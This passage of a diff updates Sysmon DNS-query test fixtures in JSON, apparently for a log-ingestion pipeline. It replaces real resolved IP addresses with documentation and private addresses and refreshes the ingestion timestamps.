"192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313814992Z", + "ingested": "2021-12-09T13:49:44.739368Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6450,17 +6368,17 @@ "type": "CNAME" }, { - "data": "185.167.164.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "185.167.164.42", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "185.167.164.43", - "185.167.164.42" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -6477,14 +6395,13 @@ "c1.adform.net" ], "ip": [ - "185.167.164.43", - "185.167.164.42" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313816258Z", + "ingested": "2021-12-09T13:49:44.739372700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6552,11 +6469,11 @@ "type": "CNAME" }, { - "data": "40.84.140.84", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6564,7 +6481,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -6572,17 +6489,17 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "40.84.140.84", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { @@ -6599,18 +6516,18 @@ "urs.microsoft.com" ], "ip": [ - "40.84.140.84", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313817515Z", + "ingested": "2021-12-09T13:49:44.739377900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6678,12 +6595,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { @@ -6700,13 +6617,13 @@ "dsum-sec.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313818737Z", + "ingested": "2021-12-09T13:49:44.739383100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6770,12 +6687,12 @@ "type": "CNAME" }, { - "data": "72.167.239.239", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.167.239.239" + "89.160.20.156" ] }, "network": { @@ -6791,13 +6708,13 @@ "ocsp.godaddy.com" ], "ip": [ - "72.167.239.239" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313820065Z", + "ingested": "2021-12-09T13:49:44.739389Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6869,7 +6786,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313821275Z", + "ingested": "2021-12-09T13:49:44.739395Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802587100Z'/\u003e\u003cEventRecordID\u003e118\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.315\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -6943,7 +6860,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313822485Z", + "ingested": "2021-12-09T13:49:44.739400900Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802678700Z'/\u003e\u003cEventRecordID\u003e119\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.315\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -6996,7 +6913,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313823824Z", + "ingested": "2021-12-09T13:49:44.739406800Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.981137800Z'/\u003e\u003cEventRecordID\u003e5\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.981\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cdf4-5c8f-0000-0010e61e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4616\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\AppData\\Local\\Temp\\Sysmon.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7060,11 +6977,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -7072,7 +6989,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -7080,7 +6997,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -7088,7 +7005,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -7096,21 +7013,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -7126,22 +7043,22 @@ "ocsp.usertrust.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313825183Z", + "ingested": "2021-12-09T13:49:44.739412600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 